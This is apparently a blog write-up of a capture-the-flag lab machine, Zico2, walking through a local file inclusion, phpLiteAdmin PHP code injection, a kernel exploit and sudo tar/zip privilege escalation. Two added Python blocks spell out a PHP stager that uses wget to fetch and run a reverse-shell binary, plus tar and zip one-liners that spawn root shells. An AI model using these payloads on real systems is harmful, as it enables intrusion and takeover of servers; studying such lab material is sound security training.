Thursday, December 13, 2018

Zico 2


- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine Zico2.

- Zico2 can be downloaded from here:,210/

- Once downloaded and imported into VMware:


- Finding Zico2's IP address:

- Scanning with Nmap:

- Dirbusting the web server reveals an interesting folder, /dbadmin:

- The scan also turns up a view.php page:

- Let's explore both view.php and /dbadmin.

- Connecting to the web server:

- Scrolling down and clicking on the "Tools" link:

- view.php includes a page chosen through a URL parameter, so we try a Local File Inclusion (LFI) via Directory Path Traversal:

- Now it's time to explore dbadmin:

- Clicking test_db.php:

- Default password for phpLiteAdmin is admin:

- It is possible to create new databases:


- Searching for phpLiteAdmin vulnerabilities, there is a Remote PHP Code Injection exploit, which allows PHP code to be injected into the server:

- Reading the first lines of the 24044.txt exploit:

- Going to exploit-db:

- Following the exploit's instructions, we create a new database named hack.php:

- Adding a test table, prueba:

- Entering <?php phpinfo()?> as the field's Default Value:

- Including the newly created database through the view.php LFI executes the embedded PHP, confirming that the exploit works:

- Why not use this Remote PHP Code Injection to upload a payload and spawn a reverse shell?

- msfvenom creates our reverse-shell payload, the ELF binary myshell:

- Making the payload executable:

- Setting up a Metasploit handler to receive the meterpreter session:

- Creating table 1 in the database /usr/databases/hack.php:

- Now let's look in detail at the Default Value entered for field 1, a PHP system() call that runs a chain of shell commands:

  • system() -> executes an external command and displays its output
  • cd /tmp -> changes to the world-writable folder /tmp
  • wget -> transfers the payload from Kali to Zico2 (Kali must serve the file over HTTP)
  • chmod 755 -> makes the payload executable
  • ./myshell -> runs the payload, which connects back to the handler

- Requesting the database through the view.php LFI executes the injected PHP and runs the payload:
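The two pieces of this chain, the traversal in view.php and the PHP tag smuggled into the SQLite file, can be reproduced offline. The following is an added example, not code from the original write-up or from phpLiteAdmin: it builds the hack.php database the way phpLiteAdmin does (the CREATE TABLE text, Default Value included, is stored verbatim in sqlite_master), resolves the traversal against an assumed document root of /var/www, and models what the PHP interpreter does when it includes the file. The payload host 192.168.1.10:8000, the table and column names, and the assumption that phpLiteAdmin doubles single quotes inside the DEFAULT literal are all made up for the demo.

```python
import os
import re
import sqlite3
import tempfile

# Tags the PHP interpreter would execute when the file is included.
PHP_TAG = re.compile(rb"<\?php(.*?)\?>", re.DOTALL)

# Constructed payloads for the demo (the Kali address is an assumption).
POC_PAYLOAD = "<?php phpinfo(); ?>"
STAGER_PAYLOAD = (
    '<?php system("cd /tmp; wget http://192.168.1.10:8000/myshell; '
    'chmod 755 myshell; ./myshell"); ?>'
)


def create_phpliteadmin_db(db_path, table, column, default_value):
    """Model of creating a database named *.php in phpLiteAdmin and adding
    a TEXT column with a Default Value.  SQLite keeps the CREATE TABLE text
    verbatim in sqlite_master, so the PHP tag lands in the file byte for
    byte.  The DEFAULT literal is single-quoted; doubling embedded quotes
    is SQL's rule and assumed to be phpLiteAdmin's, which is why the
    payload itself must avoid single quotes."""
    literal = default_value.replace("'", "''")
    sql = 'CREATE TABLE "%s" ("%s" TEXT DEFAULT \'%s\')' % (table, column, literal)
    con = sqlite3.connect(db_path)
    con.execute(sql)
    con.commit()
    con.close()
    return sql


def resolve_lfi(webroot, page):
    """include($_GET['page']) with no filtering: a relative value is joined
    to the web root and every '..' climbs one directory out of it; extra
    '..' segments beyond / are simply dropped by the filesystem."""
    return os.path.normpath(os.path.join(webroot, page))


def simulate_php_include(path):
    """What PHP does with an arbitrary included file: bytes outside
    <?php ... ?> are echoed verbatim (here the SQLite binary noise), bytes
    inside are executed.  Returns (echoed prefix, list of code strings)."""
    with open(path, "rb") as fh:
        data = fh.read()
    first = PHP_TAG.search(data)
    echoed = data[: first.start()] if first else data
    code = [m.group(1).decode("latin-1").strip() for m in PHP_TAG.finditer(data)]
    return echoed, code


def run_chain(payload, traversal="../../usr/databases/hack.php"):
    """Whole chain in a throwaway tree: var/www is the assumed document
    root and usr/databases the phpLiteAdmin directory, both under a temp
    dir.  Returns the PHP code that the inclusion would execute."""
    with tempfile.TemporaryDirectory() as root:
        webroot = os.path.join(root, "var", "www")
        dbdir = os.path.join(root, "usr", "databases")
        os.makedirs(webroot)
        os.makedirs(dbdir)
        create_phpliteadmin_db(os.path.join(dbdir, "hack.php"), "1", "1", payload)
        target = resolve_lfi(webroot, traversal)
        echoed, code = simulate_php_include(target)
        # The browser receives the SQLite header before the tag runs.
        assert echoed.startswith(b"SQLite format 3\x00")
        return code


if __name__ == "__main__":
    print(run_chain(POC_PAYLOAD))  # ['phpinfo();']
    print(run_chain(STAGER_PAYLOAD))
    # Single quotes in the payload get doubled by the DEFAULT quoting and
    # break the PHP, so the stager above uses double quotes only.
    print(run_chain("<?php system('id'); ?>"))  # ["system(''id'');"]
```

The number of `../` segments depends on where view.php actually lives on the target; since the kernel collapses any surplus `..` at `/`, over-shooting is harmless, which is why a long traversal prefix is the usual first try.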

- As a consequence a meterpreter session is achieved:

- Getting a shell:


- Upgrading the shell:

- Let's explore two ways to escalate privileges:

4.1 - Kernel exploitation

- The kernel is vulnerable to the following exploit, which allows Local Privilege Escalation:

- Copying the C program vnik.c to our local Kali machine:

- Transferring vnik.c from Kali to Zico2:

- Compiling vnik.c according to the instructions in the exploit:

- Running vnik yields a root shell:

4.2 - Abusing tar and zip

- Listing /home/zico:

- Moving into the wordpress folder:

- Reading wp-config.php we find credentials for the user zico:

- Logging in with these credentials:

- zico is a sudoer able to run /bin/tar and /usr/bin/zip as root:

- Both tar and zip can execute external commands supplied on the command line, which can be abused for Privilege Escalation:

- For instance tar can be used to spawn a root shell in this way:

- In a similar way zip can be used to spawn a root shell:
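Why a sudo rule for tar or zip is as good as a root shell: GNU tar hands `--checkpoint-action=exec=CMD` to `sh -c`, and zip's `-TT` option names the program used to "test" the archive, so both run an attacker-chosen command with the archiver's own privileges. The following added example (not from the original write-up) demonstrates the tar side without sudo: it runs tar exactly as in the escalation, but the hijacked command only records the uid it executed as, which is our own uid here and would be 0 under `sudo tar`. The zip one-liner is listed for reference but not executed, as zip may not be installed.

```python
import os
import shutil
import subprocess
import tempfile

# The two escalation one-liners as run on the target (for reference).
# /dev/null is just a placeholder archive; '#' in the zip form comments out
# the archive name that zip appends to the test command.
TAR_ROOT_SHELL = ("sudo tar cf /dev/null /dev/null --checkpoint=1 "
                  "--checkpoint-action=exec=/bin/sh")
ZIP_ROOT_SHELL = "sudo zip /tmp/x.zip /etc/hosts -T -TT '/bin/sh #'"


def gnu_tar_available():
    """Only GNU tar implements --checkpoint-action; bsdtar and busybox
    tar do not, so the demo is skipped on those systems."""
    tar = shutil.which("tar")
    if tar is None:
        return False
    proc = subprocess.run([tar, "--version"], capture_output=True, text=True)
    return "GNU tar" in proc.stdout


def current_uid():
    return os.getuid()


def tar_checkpoint_exec():
    """Run tar the way the escalation does, with a harmless command in
    place of /bin/sh: the checkpoint action writes the uid it runs as.
    Returns that uid, or None when no GNU tar is available."""
    if not gnu_tar_available():
        return None
    with tempfile.TemporaryDirectory() as work:
        dummy = os.path.join(work, "dummy")
        with open(dummy, "w") as fh:
            fh.write("x\n")
        marker = os.path.join(work, "ran_as")
        # Anything after 'exec=' is passed to sh -c with tar's privileges.
        action = "exec=id -u > " + marker
        subprocess.run(
            ["tar", "cf", os.path.join(work, "a.tar"), "-C", work, "dummy",
             "--checkpoint=1", "--checkpoint-action=" + action],
            check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
        )
        with open(marker) as fh:
            return int(fh.read().strip())


if __name__ == "__main__":
    ran_as = tar_checkpoint_exec()
    if ran_as is None:
        print("no GNU tar here, nothing to demonstrate")
    else:
        print("checkpoint action ran as uid %d (we are uid %d)" % (ran_as, current_uid()))
        print("under sudo the same action would run as uid 0:", TAR_ROOT_SHELL)
```

The defensive takeaway is the same for both binaries: a sudoers entry for an archiver cannot be made safe by restricting arguments, because the command-execution options are part of normal usage; if root-level backups are needed, wrap the exact invocation in a script that takes no user-controlled options and grant sudo on that script instead.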


- Inside the /root folder we can read the file flag.txt: